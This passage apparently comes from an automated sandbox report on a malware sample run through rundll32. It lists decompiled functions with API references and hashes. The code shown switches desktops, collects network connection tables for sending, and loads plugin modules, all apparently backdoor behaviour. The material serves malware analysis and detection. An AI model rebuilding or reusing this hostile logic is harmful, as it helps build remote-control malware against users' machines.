                                                            0x04651946
                                                            0x04651949
                                                            0x04651953
                                                            0x0465195e
                                                            0x04651915
                                                            0x0465191a
                                                            0x04651921
                                                            0x0465192a
                                                            0x0465192e
                                                            0x04651939
                                                            0x04651939
                                                            0x046518df
                                                            0x046518e4
                                                            0x046518ed
                                                            0x046518f0
                                                            0x046518fb
                                                            0x046518fb

                                                            APIs
                                                            • SetLastError.KERNEL32(0000139F), ref: 046518E4
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04651906
                                                            • SetLastError.KERNEL32(0000139F), ref: 0465191A
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04651921
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: 42018c7492aa35c78030131bf2b320c80d0f0861959333fc2808641f8772499a
                                                            • Instruction ID: 3e9c80675121192d1297f634a8ea07e04f496d8e310e50c9dc226b2d4b12de99
                                                            • Opcode Fuzzy Hash: 42018c7492aa35c78030131bf2b320c80d0f0861959333fc2808641f8772499a
                                                            • Instruction Fuzzy Hash: 4C01843A3416059BC3049F5AD8089D5B76EEFD1335F015226E625CB3D1DB706951C7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E04645660(struct HDESK__* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				void _v264;
                                                            				long _v268;
                                                            				signed int _t6;
                                                            				struct HDESK__* _t25;
                                                            				struct HDESK__* _t27;
                                                            				signed int _t28;
                                                            
                                                            				_t6 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t6 ^ _t28;
                                                            				_t27 = __ecx;
                                                            				_t25 = GetThreadDesktop(GetCurrentThreadId());
                                                            				if(GetUserObjectInformationW(_t27, 2,  &_v264, 0x100,  &_v268) != 0) {
                                                            					if(SetThreadDesktop(_t27) == 0) {
                                                            						goto L1;
                                                            					} else {
                                                            						CloseDesktop(_t25);
                                                            						return E04655AFE(_v8 ^ _t28);
                                                            					}
                                                            				} else {
                                                            					L1:
                                                            					return E04655AFE(_v8 ^ _t28);
                                                            				}
                                                            			}










                                                            0x04645669
                                                            0x04645670
                                                            0x04645675
                                                            0x04645684
                                                            0x046456a4
                                                            0x046456c1
                                                            0x00000000
                                                            0x046456c3
                                                            0x046456c4
                                                            0x046456de
                                                            0x046456de
                                                            0x046456a7
                                                            0x046456a7
                                                            0x046456b7
                                                            0x046456b7

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 04645677
                                                            • GetThreadDesktop.USER32(00000000,?,00000000), ref: 0464567E
                                                            • GetUserObjectInformationW.USER32(00000000,00000002,?,00000100,?,?,00000000), ref: 0464569C
                                                            • SetThreadDesktop.USER32(00000000,?,00000000), ref: 046456B9
                                                            • CloseDesktop.USER32(00000000,?,00000000), ref: 046456C4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DesktopThread$CloseCurrentInformationObjectUser
                                                            • String ID:
                                                            • API String ID: 2068333509-0
                                                            • Opcode ID: 86ed2cb8145bcc3e690e19d249403d1a52305ba5883af635dae1ed5e89c9c95a
                                                            • Instruction ID: b163c8a9c9880dd4fac8d2a7c4cb682afa284082c5cf07c8aa847f18659f8470
                                                            • Opcode Fuzzy Hash: 86ed2cb8145bcc3e690e19d249403d1a52305ba5883af635dae1ed5e89c9c95a
                                                            • Instruction Fuzzy Hash: AC01AD31741118ABEB24AF68E948AFE77ACEF45311F4000AAFC0AC2240FEA89D409690
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0463B4C0(signed char* _a4) {
                                                            				void* _t11;
                                                            				signed int _t13;
                                                            				signed int _t14;
                                                            				long _t16;
                                                            				long _t17;
                                                            				void* _t22;
                                                            				long _t23;
                                                            
                                                            				_t11 = ( *_a4 & 0x000000ff) - 0x23;
                                                            				if(_t11 == 0) {
                                                            					return SetEvent( *(_t22 + 8));
                                                            				}
                                                            				_t13 = _t11 - 2;
                                                            				if(_t13 == 0) {
                                                            					_t23 =  *0x4687adc; // 0x0
                                                            					_t14 = _t13 & 0xffffff00 |  *(_t23 + 0x20c) == 0x00000000;
                                                            					 *(_t23 + 0x20c) = _t14;
                                                            					_t7 = _t23 + 0x20e; // 0x20e
                                                            					if(_t14 != 0) {
                                                            						_t16 = GetFileAttributesW();
                                                            						if(_t16 != 0xffffffff) {
                                                            							goto L11;
                                                            						} else {
                                                            							_t17 =  *0x4687adc; // 0x0
                                                            							goto L9;
                                                            						}
                                                            					} else {
                                                            						return DeleteFileW();
                                                            					}
                                                            				} else {
                                                            					_t16 = _t13 - 1;
                                                            					if(_t16 != 0) {
                                                            						L11:
                                                            						return _t16;
                                                            					} else {
                                                            						_t16 =  *0x4687adc; // 0x0
                                                            						if( *((char*)(_t16 + 0x20c)) == 0) {
                                                            							goto L11;
                                                            						} else {
                                                            							L9:
                                                            							return CloseHandle(CreateFileW(_t17 + 0x20e, 0x40000000, 2, 0, 2, 0x80, 0));
                                                            						}
                                                            					}
                                                            				}
                                                            			}










                                                            0x0463b4c9
                                                            0x0463b4cc
                                                            0x00000000
                                                            0x0463b54f
                                                            0x0463b4ce
                                                            0x0463b4d1
                                                            0x0463b4e8
                                                            0x0463b4f5
                                                            0x0463b4f8
                                                            0x0463b500
                                                            0x0463b507
                                                            0x0463b513
                                                            0x0463b51c
                                                            0x00000000
                                                            0x0463b51e
                                                            0x0463b51e
                                                            0x00000000
                                                            0x0463b51e
                                                            0x0463b509
                                                            0x0463b510
                                                            0x0463b510
                                                            0x0463b4d3
                                                            0x0463b4d3
                                                            0x0463b4d6
                                                            0x0463b556
                                                            0x0463b556
                                                            0x0463b4d8
                                                            0x0463b4d8
                                                            0x0463b4e4
                                                            0x00000000
                                                            0x0463b4e6
                                                            0x0463b523
                                                            0x0463b549
                                                            0x0463b549
                                                            0x0463b4e4
                                                            0x0463b4d6

                                                            APIs
                                                            • DeleteFileW.KERNEL32(0000020E), ref: 0463B509
                                                            • CreateFileW.KERNEL32(-0000020E,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0463B53B
                                                            • CloseHandle.KERNEL32(00000000), ref: 0463B542
                                                            • SetEvent.KERNEL32(?), ref: 0463B54F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateDeleteEventHandle
                                                            • String ID:
                                                            • API String ID: 1798639166-0
                                                            • Opcode ID: c2450ec3c4001a5409fc42dbee717c16910a5492c874c987f38bc4e9689d7b35
                                                            • Instruction ID: 531d653ffecc14811433fc5cc36b565b34bc956f451ead44e5557fd4f9c72dd9
                                                            • Opcode Fuzzy Hash: c2450ec3c4001a5409fc42dbee717c16910a5492c874c987f38bc4e9689d7b35
                                                            • Instruction Fuzzy Hash: B201B172100384AEDB248F68E80DF953B64DB24B37F689255F1198A1C3EA29FD41CB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 38%
                                                            			E0463DC50(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				void* _v8;
                                                            				intOrPtr _v12;
                                                            				void* _t8;
                                                            				int _t13;
                                                            				void* _t17;
                                                            				void* _t21;
                                                            				void* _t27;
                                                            
                                                            				_v12 = __ecx;
                                                            				_t8 = E0463D570(__edi, __esi);
                                                            				_v8 = _t8;
                                                            				if(_t8 != 0) {
                                                            					_push(__esi);
                                                            					_t3 = LocalSize(_t8) + 1; // 0x1
                                                            					_t17 = LocalAlloc(0x40, _t3);
                                                            					_t27 = _v8;
                                                            					_t5 = _t17 + 1; // 0x1
                                                            					_t21 = _t5;
                                                            					 *_t17 = 0x8e;
                                                            					E0465E060(_t21, _t27, _t9);
                                                            					LocalFree(_t27);
                                                            					_t13 = LocalSize(_t17);
                                                            					_push(_t21);
                                                            					_push(0x3f);
                                                            					_push(_t13);
                                                            					_push(_t17);
                                                            					E04631C60( *((intOrPtr*)(_v12 + 4)));
                                                            					return LocalFree(_t17);
                                                            				}
                                                            				return _t8;
                                                            			}










                                                            0x0463dc56
                                                            0x0463dc59
                                                            0x0463dc5e
                                                            0x0463dc63
                                                            0x0463dc66
                                                            0x0463dc70
                                                            0x0463dc7c
                                                            0x0463dc7f
                                                            0x0463dc83
                                                            0x0463dc83
                                                            0x0463dc86
                                                            0x0463dc8a
                                                            0x0463dc99
                                                            0x0463dc9c
                                                            0x0463dca2
                                                            0x0463dca6
                                                            0x0463dca8
                                                            0x0463dca9
                                                            0x0463dcad
                                                            0x00000000
                                                            0x0463dcb6
                                                            0x0463dcba

                                                            APIs
                                                              • Part of subcall function 0463D570: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0463D59F
                                                              • Part of subcall function 0463D570: GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 0463D5C1
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DC68
                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 0463DC76
                                                            • LocalFree.KERNEL32(?), ref: 0463DC99
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DC9C
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463DCB3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 3285080383-0
                                                            • Opcode ID: 46ca776587f5920e64b9645f7d2196035e79f28a7726b98094fb33dbcf3fb398
                                                            • Instruction ID: bafaffa186bf134c654070e0ae9f6aa772498599dea87f6244456cb5f1f3fb76
                                                            • Opcode Fuzzy Hash: 46ca776587f5920e64b9645f7d2196035e79f28a7726b98094fb33dbcf3fb398
                                                            • Instruction Fuzzy Hash: 2EF0D6B1900218BBD714ABB59C48DAB7BACDF09261F000259ED09A3281FE35AD00C7B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 38%
                                                            			E0463DCC0(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				void* _v8;
                                                            				intOrPtr _v12;
                                                            				void* _t8;
                                                            				int _t13;
                                                            				void* _t17;
                                                            				void* _t21;
                                                            				void* _t27;
                                                            
                                                            				_v12 = __ecx;
                                                            				_t8 = E0463D980(__edi, __esi);
                                                            				_v8 = _t8;
                                                            				if(_t8 != 0) {
                                                            					_push(__esi);
                                                            					_t3 = LocalSize(_t8) + 1; // 0x1
                                                            					_t17 = LocalAlloc(0x40, _t3);
                                                            					_t27 = _v8;
                                                            					_t5 = _t17 + 1; // 0x1
                                                            					_t21 = _t5;
                                                            					 *_t17 = 0x8e;
                                                            					E0465E060(_t21, _t27, _t9);
                                                            					LocalFree(_t27);
                                                            					_t13 = LocalSize(_t17);
                                                            					_push(_t21);
                                                            					_push(0x3f);
                                                            					_push(_t13);
                                                            					_push(_t17);
                                                            					E04631C60( *((intOrPtr*)(_v12 + 4)));
                                                            					return LocalFree(_t17);
                                                            				}
                                                            				return _t8;
                                                            			}










                                                            0x0463dcc6
                                                            0x0463dcc9
                                                            0x0463dcce
                                                            0x0463dcd3
                                                            0x0463dcd6
                                                            0x0463dce0
                                                            0x0463dcec
                                                            0x0463dcef
                                                            0x0463dcf3
                                                            0x0463dcf3
                                                            0x0463dcf6
                                                            0x0463dcfa
                                                            0x0463dd09
                                                            0x0463dd0c
                                                            0x0463dd12
                                                            0x0463dd16
                                                            0x0463dd18
                                                            0x0463dd19
                                                            0x0463dd1d
                                                            0x00000000
                                                            0x0463dd26
                                                            0x0463dd2a

                                                            APIs
                                                              • Part of subcall function 0463D980: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0463D9BB
                                                              • Part of subcall function 0463D980: GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 0463D9CB
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DCD8
                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 0463DCE6
                                                            • LocalFree.KERNEL32(?), ref: 0463DD09
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DD0C
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463DD23
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$FreeSize$AddressAllocLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 3285080383-0
                                                            • Opcode ID: d5ed5987dc26e197da315ecf16c9f385eeee623a30b27ccab50c0d56c3b10ee3
                                                            • Instruction ID: 16116897e6dff173894283f4c28618d687de0e9190fc8a9eca7a6c7fa7d418b5
                                                            • Opcode Fuzzy Hash: d5ed5987dc26e197da315ecf16c9f385eeee623a30b27ccab50c0d56c3b10ee3
                                                            • Instruction Fuzzy Hash: D7F0A9B5900218BBD714ABB5DC49DABBBACDF09255F040259F90DA3241FE35AD00C7F1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0466C0F1(intOrPtr* _a4) {
                                                            				intOrPtr _t6;
                                                            				intOrPtr* _t21;
                                                            				void* _t23;
                                                            				void* _t24;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				void* _t27;
                                                            
                                                            				_t21 = _a4;
                                                            				if(_t21 != 0) {
                                                            					_t23 =  *_t21 -  *0x46846f0; // 0x46846e4
                                                            					if(_t23 != 0) {
                                                            						E046684AD(_t7);
                                                            					}
                                                            					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46846f4; // 0x46878b0
                                                            					if(_t24 != 0) {
                                                            						E046684AD(_t8);
                                                            					}
                                                            					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46846f8; // 0x46878b0
                                                            					if(_t25 != 0) {
                                                            						E046684AD(_t9);
                                                            					}
                                                            					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x4684720; // 0x46846e8
                                                            					if(_t26 != 0) {
                                                            						E046684AD(_t10);
                                                            					}
                                                            					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                            					_t27 = _t6 -  *0x4684724; // 0x46878b4
                                                            					if(_t27 != 0) {
                                                            						return E046684AD(_t6);
                                                            					}
                                                            				}
                                                            				return _t6;
                                                            			}










                                                            0x0466c0f7
                                                            0x0466c0fc
                                                            0x0466c100
                                                            0x0466c106
                                                            0x0466c109
                                                            0x0466c10e
                                                            0x0466c112
                                                            0x0466c118
                                                            0x0466c11b
                                                            0x0466c120
                                                            0x0466c124
                                                            0x0466c12a
                                                            0x0466c12d
                                                            0x0466c132
                                                            0x0466c136
                                                            0x0466c13c
                                                            0x0466c13f
                                                            0x0466c144
                                                            0x0466c145
                                                            0x0466c148
                                                            0x0466c14e
                                                            0x00000000
                                                            0x0466c156
                                                            0x0466c14e
                                                            0x0466c159

                                                            APIs
                                                            • _free.LIBCMT ref: 0466C109
                                                              • Part of subcall function 046684AD: HeapFree.KERNEL32(00000000,00000000,?,046612C5,00000001,00000001), ref: 046684C3
                                                              • Part of subcall function 046684AD: GetLastError.KERNEL32(D355BE4E,?,046612C5,00000001,00000001), ref: 046684D5
                                                            • _free.LIBCMT ref: 0466C11B
                                                            • _free.LIBCMT ref: 0466C12D
                                                            • _free.LIBCMT ref: 0466C13F
                                                            • _free.LIBCMT ref: 0466C151
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: aa4fe9c019873c1f787b2481c17baaef9f77e80b8d77851f0226c8fb66b597eb
                                                            • Instruction ID: 844784606de95c9b8332dcac1cfffbe1c97fe4809f6b3cd691dc0565f5a588e9
                                                            • Opcode Fuzzy Hash: aa4fe9c019873c1f787b2481c17baaef9f77e80b8d77851f0226c8fb66b597eb
                                                            • Instruction Fuzzy Hash: B1F0683270164177C610EB64F485D15B3D9EA64324754580DF99AD7600FF34FC814ED4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0463AA50(intOrPtr* __ecx) {
                                                            				void* __esi;
                                                            				struct _CRITICAL_SECTION* _t10;
                                                            				struct _CRITICAL_SECTION* _t14;
                                                            				intOrPtr* _t18;
                                                            				struct _CRITICAL_SECTION* _t20;
                                                            
                                                            				_t18 = __ecx;
                                                            				 *__ecx = 0x467df78;
                                                            				if( *((intOrPtr*)(__ecx + 0x24)) == 0) {
                                                            					L6:
                                                            					_t10 = _t18 + 0x28;
                                                            					DeleteCriticalSection(_t10);
                                                            					return _t10;
                                                            				} else {
                                                            					_t20 = __ecx + 0x28;
                                                            					EnterCriticalSection(_t20);
                                                            					if( *((intOrPtr*)(_t18 + 0x24)) != 0) {
                                                            						_t16 =  *((intOrPtr*)(_t18 + 0x40));
                                                            						 *((intOrPtr*)(_t18 + 0x24)) = 0;
                                                            						if( *((intOrPtr*)(_t18 + 0x40)) != 0) {
                                                            							E0464FE10(_t16, _t20);
                                                            							 *((intOrPtr*)(_t18 + 0x40)) = 0;
                                                            						}
                                                            						LeaveCriticalSection(_t20);
                                                            						 *((intOrPtr*)( *_t18 + 4))();
                                                            						goto L6;
                                                            					} else {
                                                            						LeaveCriticalSection(_t20);
                                                            						_t14 = _t18 + 0x28;
                                                            						DeleteCriticalSection(_t14);
                                                            						return _t14;
                                                            					}
                                                            				}
                                                            			}








                                                            0x0463aa51
                                                            0x0463aa57
                                                            0x0463aa5d
                                                            0x0463aaad
                                                            0x0463aaad
                                                            0x0463aab1
                                                            0x0463aab8
                                                            0x0463aa5f
                                                            0x0463aa60
                                                            0x0463aa64
                                                            0x0463aa6e
                                                            0x0463aa84
                                                            0x0463aa87
                                                            0x0463aa90
                                                            0x0463aa92
                                                            0x0463aa97
                                                            0x0463aa97
                                                            0x0463aa9f
                                                            0x0463aaa9
                                                            0x00000000
                                                            0x0463aa70
                                                            0x0463aa71
                                                            0x0463aa78
                                                            0x0463aa7c
                                                            0x0463aa83
                                                            0x0463aa83
                                                            0x0463aa6e

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 0463AA64
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0463AA71
                                                            • RtlDeleteCriticalSection.NTDLL(00000000), ref: 0463AA7C
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0463AA9F
                                                            • RtlDeleteCriticalSection.NTDLL(00000000), ref: 0463AAB1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$DeleteLeave$Enter
                                                            • String ID:
                                                            • API String ID: 2043033798-0
                                                            • Opcode ID: fb652d2dbc78de409c15ddaa724e0ee87c336c1f9e8ca193f4300ce525d271fb
                                                            • Instruction ID: 8c38c4db5793322b7957fce237e192522098e7caf9f00a56b4bdafd0001c4dac
                                                            • Opcode Fuzzy Hash: fb652d2dbc78de409c15ddaa724e0ee87c336c1f9e8ca193f4300ce525d271fb
                                                            • Instruction Fuzzy Hash: 4FF0F972101612EFD7189F65F90CBD9BBADFF88326F040119E50A83A44EB38F565CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04647C30(intOrPtr* __ecx) {
                                                            				void* _t11;
                                                            				int _t13;
                                                            				void* _t15;
                                                            				intOrPtr* _t19;
                                                            
                                                            				_t19 = __ecx;
                                                            				 *__ecx = 0x467f17c;
                                                            				InterlockedExchange(__ecx + 0xc, 0);
                                                            				WaitForSingleObject( *(_t19 + 0xe4), 0xffffffff);
                                                            				CloseHandle( *(_t19 + 0xe4));
                                                            				_t11 =  *(_t19 + 0x18);
                                                            				if(_t11 != 0) {
                                                            					CloseHandle(_t11);
                                                            				}
                                                            				E04632590(_t15, _t19 + 0x1c);
                                                            				 *_t19 = 0x467e8b0;
                                                            				_t13 = CloseHandle( *(_t19 + 8));
                                                            				 *_t19 = 0x467e8c0;
                                                            				return _t13;
                                                            			}







                                                            0x04647c31
                                                            0x04647c39
                                                            0x04647c40
                                                            0x04647c4e
                                                            0x04647c60
                                                            0x04647c62
                                                            0x04647c67
                                                            0x04647c6a
                                                            0x04647c6a
                                                            0x04647c6f
                                                            0x04647c77
                                                            0x04647c7d
                                                            0x04647c80
                                                            0x04647c87

                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 04647C40
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046397AF,046878D8,046878D8,00000000), ref: 04647C4E
                                                            • CloseHandle.KERNEL32(?,?,00000000,046397AF,046878D8,046878D8,00000000), ref: 04647C60
                                                            • CloseHandle.KERNEL32(?,?,00000000,046397AF,046878D8,046878D8,00000000), ref: 04647C6A
                                                            • CloseHandle.KERNEL32(?,?,00000000,046397AF,046878D8,046878D8,00000000), ref: 04647C7D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$ExchangeInterlockedObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 1896077197-0
                                                            • Opcode ID: 7c81e4210d5f2a473fa03bd54263d8ba3c7af5503c2e7ebde7b274b86bde62cf
                                                            • Instruction ID: ba70b57879f76f708bc7898c0d5bcf7296d31402f1ac55b203fb24907bb6d909
                                                            • Opcode Fuzzy Hash: 7c81e4210d5f2a473fa03bd54263d8ba3c7af5503c2e7ebde7b274b86bde62cf
                                                            • Instruction Fuzzy Hash: 24F01C751007119FDB35AF25EC48E87BBF8EF84320B114E5EE5A6D22A0FA74B845CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0464E163
                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,0464DF5B,?,00000000,?,74CB4C30), ref: 0464E16F
                                                            • WSAResetEvent.WS2_32(?,?,?,?,?,?,?,?,0464DF5B,?,00000000,?,74CB4C30), ref: 0464E1AA
                                                              • Part of subcall function 04637AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 04637ADE
                                                              • Part of subcall function 04637AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0464FA53
                                                              • Part of subcall function 04637AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0464FA7B
                                                              • Part of subcall function 04637AC0: SetLastError.KERNEL32(0000139F,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterEnumEventEventsExceptionLeaveNetworkRaiseReset
                                                            • String ID:
                                                            • API String ID: 1862898202-3916222277
                                                            • Opcode ID: ca869208b72f136a51332e806f1ca4b3cb3635181b8cf792b86b4eef71412a64
                                                            • Instruction ID: 7857cdf2203ef9f74a36207a4c85d91fcf11c56a66c8702eec27d05a9ffa3326
                                                            • Opcode Fuzzy Hash: ca869208b72f136a51332e806f1ca4b3cb3635181b8cf792b86b4eef71412a64
                                                            • Instruction Fuzzy Hash: C841A3716007049BEB208F69D848BABBBF6BFD4314F05061DD85697790FBB6F9058B80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 70%
                                                            			E0463E420(void* __ebx, void* __ecx) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void _t25;
                                                            				struct _SECURITY_ATTRIBUTES** _t26;
                                                            				struct _SECURITY_ATTRIBUTES** _t31;
                                                            				struct _SECURITY_ATTRIBUTES** _t37;
                                                            				struct _SECURITY_ATTRIBUTES** _t45;
                                                            				intOrPtr* _t46;
                                                            				void* _t48;
                                                            				struct _SECURITY_ATTRIBUTES** _t50;
                                                            				struct _SECURITY_ATTRIBUTES** _t58;
                                                            				struct _SECURITY_ATTRIBUTES** _t59;
                                                            				void* _t60;
                                                            
                                                            				_t48 = __ebx;
                                                            				_t60 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x24)) == 0) {
                                                            					__eflags =  *(__ecx + 0x28);
                                                            					if( *(__ecx + 0x28) != 0) {
                                                            						goto L5;
                                                            					} else {
                                                            						__eflags =  *(__ecx + 0x2c);
                                                            						if(__eflags == 0) {
                                                            							_t45 = L04655B14(__ecx, __eflags, 0x14);
                                                            							_t45[1] = 0;
                                                            							 *_t45 = 0;
                                                            							 *(_t60 + 0x2c) = _t45;
                                                            						}
                                                            						__eflags =  *(_t60 + 0x14);
                                                            						if( *(_t60 + 0x14) == 0) {
                                                            							L23:
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						} else {
                                                            							_t25 =  *_t60;
                                                            							__eflags =  *(_t25 + 0x24);
                                                            							if( *(_t25 + 0x24) <= 0) {
                                                            								goto L23;
                                                            							} else {
                                                            								_t26 =  *(_t60 + 0x2c);
                                                            								__eflags = _t26[1];
                                                            								if(_t26[1] == 0) {
                                                            									E0463E5C0(_t60);
                                                            									E0463D140( *(_t60 + 0x2c),  *(_t60 + 0x14),  *((intOrPtr*)( *_t60 + 0x24)));
                                                            									E0463E5C0(_t60);
                                                            								}
                                                            								_t50 =  *(_t60 + 0x2c);
                                                            								__eflags = _t50[1];
                                                            								if(_t50[1] == 0) {
                                                            									goto L23;
                                                            								} else {
                                                            									_t58 = E0463D260(_t50, "conf");
                                                            									__eflags = _t58;
                                                            									if(_t58 != 0) {
                                                            										_t37 = L046363D0(_t48, _t58, _t60) + 4;
                                                            										__eflags = _t37;
                                                            										 *_t58( *((intOrPtr*)(L046363D0(_t48, _t58, _t60) + 0x30)), _t37,  *((intOrPtr*)(L046363D0(_t48, _t58, _t60) + 0x28)));
                                                            									}
                                                            									_t59 = E0463D260( *(_t60 + 0x2c), "init");
                                                            									__eflags = _t59;
                                                            									if(_t59 != 0) {
                                                            										 *_t59(L046363D0(_t48, _t59, _t60));
                                                            									}
                                                            									__eflags =  *((intOrPtr*)(_t60 + 0x1c)) - 2;
                                                            									if( *((intOrPtr*)(_t60 + 0x1c)) == 2) {
                                                            										_t52 =  *(_t60 + 0x2c);
                                                            										__eflags =  *(_t60 + 0x2c);
                                                            										if( *(_t60 + 0x2c) != 0) {
                                                            											_t31 = E0463D260(_t52, "dbug");
                                                            											__eflags = _t31;
                                                            											if(_t31 != 0) {
                                                            												 *_t31(1);
                                                            											}
                                                            										}
                                                            									}
                                                            									 *((intOrPtr*)(_t60 + 0x20)) = CreateThread(0, 0,  &M0463E300, _t60, 0, 0);
                                                            									return 1;
                                                            								}
                                                            							}
                                                            						}
